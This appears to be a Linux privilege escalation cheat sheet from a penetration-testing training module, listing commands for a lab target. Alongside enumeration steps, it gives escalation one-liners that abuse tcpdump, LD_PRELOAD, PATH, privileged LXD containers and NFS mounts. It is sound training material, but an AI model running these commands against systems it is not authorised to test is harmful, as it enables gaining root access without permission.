
Linux Privilege Escalation Module Cheat Sheet

Linux privilege escalation

Uploaded by

vuduchieu1611
Copyright
© © All Rights Reserved

LINUX PRIVILEGE ESCALATION

CHEAT SHEET
Command                                                                             Description

ssh htb-student@<target IP>                                                         SSH to lab target
ps aux | grep root                                                                  See processes running as root
ps au                                                                               See logged in users
ls /home                                                                            View user home directories
ls -l ~/.ssh                                                                        Check for SSH keys for current user
history                                                                             Check the current user's Bash history
sudo -l                                                                             Can the user run anything as another user?
ls -la /etc/cron.daily                                                              Check for daily Cron jobs
lsblk                                                                               Check for unmounted file systems/drives
find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null                         Find world-writeable directories
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null                         Find world-writeable files
uname -a                                                                            Check the kernel version
cat /etc/lsb-release                                                                Check the OS version
gcc kernel_expoit.c -o kernel_expoit                                                Compile an exploit written in C
screen -v                                                                           Check the installed version of Screen
./pspy64 -pf -i 1000                                                                View running processes with pspy
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null                       Find binaries with the SUID bit set
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null                       Find binaries with the SETGID bit set
sudo /usr/sbin/tcpdump -ln -i ens192 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root   Privilege escalation with tcpdump
echo $PATH                                                                          Check the current user's PATH variable contents
PATH=.:${PATH}                                                                      Add a . to the beginning of the current user's PATH
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null                     Search for config files
ldd /bin/ls                                                                         View the shared objects required by a binary
sudo LD_PRELOAD=/tmp/root.so /usr/sbin/apache2 restart                              Escalate privileges using LD_PRELOAD
readelf -d payroll | grep PATH                                                      Check the RUNPATH of a binary
gcc src.c -fPIC -shared -o /development/libshared.so                                Compile a shared library
lxd init                                                                            Start the LXD initialization process
lxc image import alpine.tar.gz alpine.tar.gz.root --alias alpine                    Import a local image
lxc init alpine r00t -c security.privileged=true                                    Start a privileged LXD container
lxc config device add r00t mydev disk source=/ path=/mnt/root recursive=true        Mount the host file system in a container
lxc start r00t                                                                      Start the container
showmount -e 10.129.2.12                                                            Show the NFS export list
sudo mount -t nfs 10.129.2.12:/tmp /mnt                                             Mount an NFS share locally
tmux -S /shareds new -s debugsess                                                   Create a shared tmux session socket
./lynis audit system                                                                Perform a system audit with Lynis
